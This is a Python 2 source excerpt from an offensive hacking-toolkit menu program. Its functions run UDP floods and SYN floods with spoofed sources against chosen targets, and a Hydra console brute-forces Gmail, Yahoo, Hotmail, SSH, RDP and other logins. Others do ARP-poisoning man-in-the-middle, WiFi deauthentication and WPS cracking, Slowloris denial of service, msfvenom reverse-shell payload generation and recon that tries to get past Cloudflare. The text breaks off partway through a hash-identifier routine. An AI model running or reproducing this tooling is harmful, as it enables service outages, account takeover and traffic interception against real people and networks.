whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - os.system("python " + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') - os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) - os.system('echo "run\n" >> handler.rc') - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - 